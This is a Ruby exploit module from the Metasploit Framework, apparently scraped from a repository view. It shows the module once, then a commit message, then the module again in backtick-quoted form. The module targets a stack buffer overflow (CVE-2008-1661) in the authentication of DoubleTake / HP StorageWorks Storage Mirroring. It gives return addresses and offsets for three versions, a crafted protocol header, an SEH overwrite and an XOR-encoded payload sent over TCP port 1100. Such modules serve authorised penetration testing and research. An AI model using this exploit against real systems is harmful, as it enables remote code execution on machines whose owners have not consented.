metasploit-framework/modules/exploits/windows/misc/doubletake.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##


require 'msf/core'

module Msf

class Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote
	include Exploit::Remote::Tcp
	include Exploit::Remote::Seh
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow',
			'Description'    => %q{
					This module exploits a stack overflow in the authentication mechanism of 
					NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability
					was found by Titon of Bastard Labs.
			},
			'Author'         => [ 'ri0t <ri0t[at]ri0tnet.net>' ],
			'Version'        => '$Revision$',
			'References'     => 
				[
					['CVE', '2008-1661'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					['doubletake 4.5.0',      { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ],
					['doubletake 4.4.2',      { 'Ret' => 0x0074e307, 'Offset' => 944  } ],  
					['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ],
				],
			 'DefaultTarget' => 0,

			'Privileged'     => false,

			))

			register_options(
			[
				Opt::RPORT(1100)
			], self.class)
	end

	def exploit

		connect

		print_status("Trying target #{target.name}...")

         header = 
               "\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+
               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+
               "\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"

		xor = Rex::Encoding::Xor::Byte
		filler =  rand_text_english(1) * (target['Offset'])
		seh = generate_seh_payload(target.ret)
		buffercoded = xor.encode(seh+payload.encoded, [0xf0].pack("C"))
		sploit =  header + filler + buffercoded[0]
		sock.put(sploit)
		
		handler
		disconnect	
	end

end
end
Add riot's DoubleTake exploit. Set the svn:keywords properties where it was missing git-svn-id: file:///home/svn/framework3/trunk@5526 4d416f70-5f16-0410-b530-b9f4589650da 2008-06-06 04:39:44 +00:00			`##`
			`# $Id$`
			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
			`# http://metasploit.com/projects/Framework/`
			`##`


			`require 'msf/core'`

			`module Msf`

			`class Exploits::Windows::Misc::Doubletake < Msf::Exploit::Remote`
			`include Exploit::Remote::Tcp`
			`include Exploit::Remote::Seh`
			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow',`
			`'Description' => %q{`
			`This module exploits a stack overflow in the authentication mechanism of`
			`NSI Doubletake which is also rebranded as HP Storage Works. This vulnerability`
			`was found by Titon of Bastard Labs.`
			`},`
			`'Author' => [ 'ri0t <ri0t[at]ri0tnet.net>' ],`
			`'Version' => '$Revision$',`
			`'References' =>`
			`[`
			`['CVE', '2008-1661'],`
			`],`
			`'DefaultOptions' =>`
			`{`
			`'EXITFUNC' => 'process',`
			`},`
			`'Payload' =>`
			`{`
			`'Space' => 500,`
			`'BadChars' => "\x00",`
			`},`
			`'Platform' => 'win',`

			`'Targets' =>`
			`[`
			`['doubletake 4.5.0', { 'Ret' => 0x006f5fa7, 'Offset' => 5544 } ],`
			`['doubletake 4.4.2', { 'Ret' => 0x0074e307, 'Offset' => 944 } ],`
			`['doubletake 4.5.0.1819', { 'Ret' => 0x006e62dd, 'Offset' => 5544 } ],`
			`],`
			`'DefaultTarget' => 0,`

			`'Privileged' => false,`

			`))`

			`register_options(`
			`[`
			`Opt::RPORT(1100)`
			`], self.class)`
			`end`

			`def exploit`

			`connect`

			`print_status("Trying target #{target.name}...")`

			`header =`
			`"\x00\x02\x00\x01\x27\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+`
			`"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x36\x00\x00\x00\x00"+`
			`"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01"+`
			`"\x00\x00\x00\x1e\x00\x00\x00\x01\x00\x01"`

			`xor = Rex::Encoding::Xor::Byte`
			`filler = rand_text_english(1) * (target['Offset'])`
			`seh = generate_seh_payload(target.ret)`
			`buffercoded = xor.encode(seh+payload.encoded, [0xf0].pack("C"))`
			`sploit = header + filler + buffercoded[0]`
			`sock.put(sploit)`

			`handler`
			`disconnect`
			`end`

			`end`
			`end`